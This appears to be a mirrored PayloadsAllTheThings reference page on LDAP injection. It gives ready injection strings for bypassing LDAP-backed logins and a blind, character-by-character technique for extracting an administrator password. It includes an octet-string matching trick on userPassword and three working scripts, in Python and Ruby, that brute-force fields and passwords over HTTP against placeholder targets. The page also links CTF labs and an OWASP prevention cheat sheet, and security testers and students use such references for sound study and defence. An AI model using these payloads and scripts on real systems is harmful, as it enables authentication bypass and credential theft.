index.md (6963B)
1 --- 2 title: "LDAP Injection" 3 topic: "LDAP Injection" 4 topicSlug: "ldap-injection" 5 sourcePath: "LDAP Injection/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/LDAP%20Injection/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # LDAP Injection 12 13 > LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy. 14 15 ## Summary 16 17 * [Methodology](#methodology) 18 * [Authentication Bypass](#authentication-bypass) 19 * [Blind Exploitation](#blind-exploitation) 20 * [Defaults Attributes](#defaults-attributes) 21 * [Exploiting userPassword Attribute](#exploiting-userpassword-attribute) 22 * [Scripts](#scripts) 23 * [Discover Valid LDAP Fields](#discover-valid-ldap-fields) 24 * [Special Blind LDAP Injection](#special-blind-ldap-injection) 25 * [Labs](#labs) 26 * [References](#references) 27 28 ## Methodology 29 30 LDAP Injection is a vulnerability that occurs when user-supplied input is used to construct LDAP queries without proper sanitization or escaping 31 32 ### Authentication Bypass 33 34 Attempt to manipulate the filter logic by injecting always-true conditions. 35 36 **Example 1**: This LDAP query exploits logical operators in the query structure to potentially bypass authentication 37 38 ```sql 39 user = *)(uid=*))(|(uid=* 40 pass = password 41 query = (&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==)) 42 ``` 43 44 **Example 2**: This LDAP query exploits logical operators in the query structure to potentially bypass authentication 45 46 ```sql 47 user = admin)(!(&(1=0 48 pass = q)) 49 query = (&(uid=admin)(!(&(1=0)(userPassword=q)))) 50 ``` 51 52 ### Blind Exploitation 53 54 This scenario demonstrates LDAP blind exploitation using a technique similar to binary search or character-based brute-forcing to discover sensitive information like passwords. It relies on the fact that LDAP filters respond differently to queries based on whether the conditions match or not, without directly revealing the actual password. 55 56 ```sql 57 (&(sn=administrator)(password=*)) : OK 58 (&(sn=administrator)(password=A*)) : KO 59 (&(sn=administrator)(password=B*)) : KO 60 ... 61 (&(sn=administrator)(password=M*)) : OK 62 (&(sn=administrator)(password=MA*)) : KO 63 (&(sn=administrator)(password=MB*)) : KO 64 ... 65 (&(sn=administrator)(password=MY*)) : OK 66 (&(sn=administrator)(password=MYA*)) : KO 67 (&(sn=administrator)(password=MYB*)) : KO 68 (&(sn=administrator)(password=MYC*)) : KO 69 ... 70 (&(sn=administrator)(password=MYK*)) : OK 71 (&(sn=administrator)(password=MYKE)) : OK 72 ``` 73 74 **LDAP Filter Breakdown**: 75 76 * `&`: Logical AND operator, meaning all conditions inside must be true. 77 * `(sn=administrator)`: Matches entries where the sn (surname) attribute is administrator. 78 * `(password=X*)`: Matches entries where the password starts with X (case-sensitive). The asterisk (*) is a wildcard, representing any remaining characters. 79 80 ## Defaults Attributes 81 82 Can be used in an injection like `*)(ATTRIBUTE_HERE=*` 83 84 ```bash 85 userPassword 86 surname 87 name 88 cn 89 sn 90 objectClass 91 mail 92 givenName 93 commonName 94 ``` 95 96 ## Exploiting userPassword Attribute 97 98 `userPassword` attribute is not a string like the `cn` attribute for example but it’s an OCTET STRING 99 In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18). 100 101 > octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit. 102 103 ```bash 104 userPassword:2.5.13.18:=\xx (\xx is a byte) 105 userPassword:2.5.13.18:=\xx\xx 106 userPassword:2.5.13.18:=\xx\xx\xx 107 ``` 108 109 ## Scripts 110 111 ### Discover Valid LDAP Fields 112 113 ```python 114 #!/usr/bin/python3 115 import requests 116 import string 117 118 fields = [] 119 url = 'https://URL.com/' 120 f = open('dic', 'r') 121 world = f.read().split('\n') 122 f.close() 123 124 for i in world: 125 r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla)) 126 if 'TRUE CONDITION' in r.text: 127 fields.append(str(i)) 128 129 print(fields) 130 ``` 131 132 ### Special Blind LDAP Injection 133 134 ```python 135 #!/usr/bin/python3 136 import requests, string 137 alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;" 138 139 flag = "" 140 for i in range(50): 141 print("[i] Looking for number " + str(i)) 142 for char in alphabet: 143 r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char) 144 if ("TRUE CONDITION" in r.text): 145 flag += char 146 print("[+] Flag: " + flag) 147 break 148 ``` 149 150 Exploitation script by [@noraj](https://github.com/noraj) 151 152 ```ruby 153 #!/usr/bin/env ruby 154 require 'net/http' 155 alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('') 156 157 flag = '' 158 (0..50).each do |i| 159 puts("[i] Looking for number #{i}") 160 alphabet.each do |char| 161 r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}")) 162 if /TRUE CONDITION/.match?(r) 163 flag += char 164 puts("[+] Flag: #{flag}") 165 break 166 end 167 end 168 end 169 ``` 170 171 ## Labs 172 173 * [Root Me - LDAP injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/LDAP-injection-Authentication) 174 * [Root Me - LDAP injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/LDAP-injection-Blind) 175 176 ## References 177 178 * [[European Cyber Week] - AdmYSion - Alan Marrec (Maki) - January 14, 2025](https://web.archive.org/web/20250114083154/https://www.maki.bzh/writeups/ecw2018admyssion/) 179 * [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN - October 31, 2018](https://web.archive.org/web/20200924103615/https://0xukn.fr/posts/writeupecw2018admyssion/) 180 * [How To Configure OpenLDAP and Perform Administrative LDAP Tasks - Justin Ellingwood - May 30, 2015](https://web.archive.org/web/20260119175101/https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks) 181 * [How To Manage and Use LDAP Servers with OpenLDAP Utilities - Justin Ellingwood - May 29, 2015](https://web.archive.org/web/20160305121823/https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities) 182 * [LDAP Blind Explorer - Alonso Parada - August 12, 2011](https://web.archive.org/web/20160120073444/https://code.google.com/p/ldap-blind-explorer/) 183 * [LDAP Injection & Blind LDAP Injection - Chema Alonso, José Parada Gimeno - October 10, 2008](https://web.archive.org/web/20081010181534/http://blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf) 184 * [LDAP Injection Prevention Cheat Sheet - OWASP - July 16, 2019](https://web.archive.org/web/20190719164052/https://www.owasp.org/index.php/LDAP_injection)